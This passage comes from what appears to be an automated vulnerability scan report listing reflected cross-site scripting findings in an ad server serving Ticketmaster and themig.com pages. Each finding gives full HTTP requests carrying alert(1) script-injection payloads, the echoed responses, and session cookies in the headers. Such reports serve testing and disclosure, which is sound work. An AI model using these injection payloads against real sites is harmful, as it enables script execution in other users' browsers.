GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=dba97'-alert(1)-'49efd703601&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='dba97'-alert(1)-'49efd703601';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';


...[SNIP]...

4.73. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_tixp_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_tixp_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0af1'-alert(1)-'f9277495374 was submitted in the _RM_HTML_tixp_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=b0af1'-alert(1)-'f9277495374&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
t_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='b0af1'-alert(1)-'f9277495374';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var art
...[SNIP]...

4.74. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venue_name_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_venue_name_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f8ad'-alert(1)-'530dfc3a08e was submitted in the _RM_HTML_venue_name_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium9f8ad'-alert(1)-'530dfc3a08e&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
t_name='U2%20360%BA%20Tour';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium9f8ad'-alert(1)-'530dfc3a08e';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C5
...[SNIP]...

4.75. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venueid_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_venueid_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bb01'-alert(1)-'67bf9ccb3cd was submitted in the _RM_HTML_venueid_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=12337bb01'-alert(1)-'67bf9ccb3cd&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...

var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='12337bb01'-alert(1)-'67bf9ccb3cd';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e = new Image (1,1);
var b3_f = new Image (1,1);
var b3_g
...[SNIP]...

4.76. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venuezip_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_venuezip_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a2ce'-alert(1)-'37855b65c24 was submitted in the _RM_HTML_venuezip_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=070733a2ce'-alert(1)-'37855b65c24&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
ur';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='070733a2ce'-alert(1)-'37855b65c24';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1
...[SNIP]...

4.77. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1627503762@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffcbb"><script>alert(1)</script>3da72bcef52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSampleffcbb"><script>alert(1)</script>3da72bcef52/wwww.themig.com/1627503762@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Contact%20Us&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/contact.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; session=1311100939|1311100939

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSampleffcbb"><script>alert(1)</script>3da72bcef52/wwww.themig.com/149311977/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.78. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1627503762@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f185"><script>alert(1)</script>c015f41fa84 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.com9f185"><script>alert(1)</script>c015f41fa84/1627503762@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Contact%20Us&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/contact.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; session=1311100939|1311100939

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.com9f185"><script>alert(1)</script>c015f41fa84/1805526034/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.79. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1627503762@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a0e6"><script>alert(1)</script>9ef75515961 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.com/1627503762@x968a0e6"><script>alert(1)</script>9ef75515961?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Contact%20Us&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/contact.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; session=1311100939|1311100939

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.com/1361702731/x968a0e6"><script>alert(1)</script>9ef75515961/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.80. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1936689153@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dd27"><script>alert(1)</script>7e0afdb5b4d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample9dd27"><script>alert(1)</script>7e0afdb5b4d/wwww.themig.com/1936689153@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Home&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample9dd27"><script>alert(1)</script>7e0afdb5b4d/wwww.themig.com/831506250/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.81. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1936689153@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fdec"><script>alert(1)</script>c64d1920d72 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.com5fdec"><script>alert(1)</script>c64d1920d72/1936689153@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Home&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
